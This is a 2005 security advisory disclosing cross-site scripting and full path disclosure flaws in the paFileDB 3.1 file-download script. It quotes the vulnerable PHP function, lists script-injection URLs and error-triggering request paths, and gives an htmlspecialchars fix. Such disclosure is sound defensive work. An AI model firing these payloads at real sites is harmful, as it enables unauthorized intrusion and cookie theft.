SecurityReason - Multiple vulnerabilities in paFileDB ( Research Advisory )

Advisory Text :

-=[ Multiple vulnerabilities in paFileDB ]=-

Author: sp3x
Date: 8. March 2005

Affected software :
===================
paFileDB version : => 3.1

Description :
=============

paFileDB is designed to allow webmasters have a database of files for
download on their site.
To add a download, all you do is upload the file using FTP or whatever
method you use, log
into paFileDB's admin center, and fill out a form to add a file. paFileDB
lets you edit and
delete the files too.
No more messing with a bunch of HTML pages for a file database on your
site!
Using speedy MySQL for storing data, and powerful PHP for processing
everything, paFileDB is
one of the best and easiest ways to manage files!

Cross-site scripting - XSS :
============================

In PaFileDB there are XSS that can be used to steal cookies and do other
operations, which in
normal conditions are not permitted by browser's cross-domain security
restrictions.

First let's see the vuln code.
/includes/functions.php

Code:
---------------------------------------------------------------------------
----------------------
function jumpmenu($db, $pageurl,$pafiledb_sql,$str) {
echo("<form name=\"form1\">
<select name=\"menu1\" onChange=\"MM_jumpMenu('parent',this,0)\"
class=\"forminput\">
<option value=\"$pageurl\" selected>$str[jump]</option>
<option value=\"$pageurl\">---------</option>");
.....
---------------------------------------------------------------------------
-----------------------

As we can see the $pageurl variable is vuln for XSS.

Examples:
=========

XSS:
----
http://[target]/[pafiledb_dir]/pafiledb.php?"><script>alert();</script>
http://[target]/[pafiledb_dir]/pafiledb.php?action="><script>alert();</scri
pt>
http://[target]/[pafiledb_dir]/pafiledb.php?[something]="><script>alert();<
/script>
http://[target]/[pafiledb_dir]/pafiledb.php?[something]=&[something]="><scr
ipt>alert();</script>

and more and more....
So we can enter XSS also in non existing variable.
This XSS is almost on all site because the function jumpmenu is used in
pafiledb.php
- line 30 in pafiledb.php - require "./includes/functions.php";

Full Path Disclosure :
======================

Full path to script must be kept in secret because it can lead to
successful attack on the
website. If the attacker know Full path to script , he can start searching
some more info on
others folders or about the server where the site is and then try to break
in.

Many scripts can be accessed directly and this will provoke standard
php error messages, which leads to full path disclosure.

Examples :
----------

http://[target]/[pafiledb_dir]/pafiledb.php?str=[something]

Error message :
---------------
=====================================
Fatal error: Cannot use assign-op operators with overloaded objects nor
string offsets in
/[patch to site]/public_html/pafiledb/lang/english.php on line 55
=====================================

http://[target]/[pafiledb_dir]/includes/viewall.php

Error message :
---------------
=====================================
Fatal error: Call to undefined function: locbar() in /patch to
site/public_html/pafiledb/includes/viewall.php on line 16
=====================================

http://[target]/[pafiledb_dir]/includes/stats.php
http://[target]/[pafiledb_dir]/includes/search.php
http://[target]/[pafiledb_dir]/includes/rate.php
http://[target]/[pafiledb_dir]/includes/main.php

http://[target]/[pafiledb_dir]/includes/license.php

Error message :
---------------
=====================================
Fatal error: Call to a member function on a non-object in /patch to
site/public_html/pafiledb/includes/license.php on line 12
=====================================

http://[target]/[pafiledb_dir]/includes/category.php
http://[target]/[pafiledb_dir]/includes/download.php
http://[target]/[pafiledb_dir]/includes/file.php
http://[target]/[pafiledb_dir]/includes/email.php

http://[target]/[pafiledb_dir]/includes/admin.php

Error message :
---------------
=====================================
Warning: main(./includes/admin/login.php): failed to open stream: No such
file or directory in
/home/phparena/public_html/demo/pafiledb/includes/admin.php on line 17

Warning: main(./includes/admin/login.php): failed to open stream: No such
file or directory in
/home/phparena/public_html/demo/pafiledb/includes/admin.php on line 17

Warning: main(): Failed opening './includes/admin/login.php' for inclusion
(include_path='.:/usr/lib/php:/usr/local/lib/php') in
/home/phparena/public_html/demo/pafiledb/includes/admin.php on line 17
======================================

How to fix :
============

XSS :
-----

give this in function jumpmenu -> file /includes/functions.php

$pageurl=htmlspecialchars($pageurl)

Function should look like this :

Code :
---------------------------------------------------------------------------
----------------------
function jumpmenu($db, $pageurl,$pafiledb_sql,$str) {
$pageurl=htmlspecialchars($pageurl);
echo("<form name=\"form1\">
<select name=\"menu1\" onChange=\"MM_jumpMenu('parent',this,0)\"
class=\"forminput\">
<option value=\"$pageurl\" selected>$str[jump]</option>
<option value=\"$pageurl\">---------</option>");
.....
---------------------------------------------------------------------------
-----------------------

Download the new version of the script or update.

Vendor :
========

No respond

Greetz :
========

Special greetz : cXIb8O3 (we are starting man :] ), pkw (you now :])

Contact :
=========

sp3x[at]securityreason[dot].com
www.securityreason.com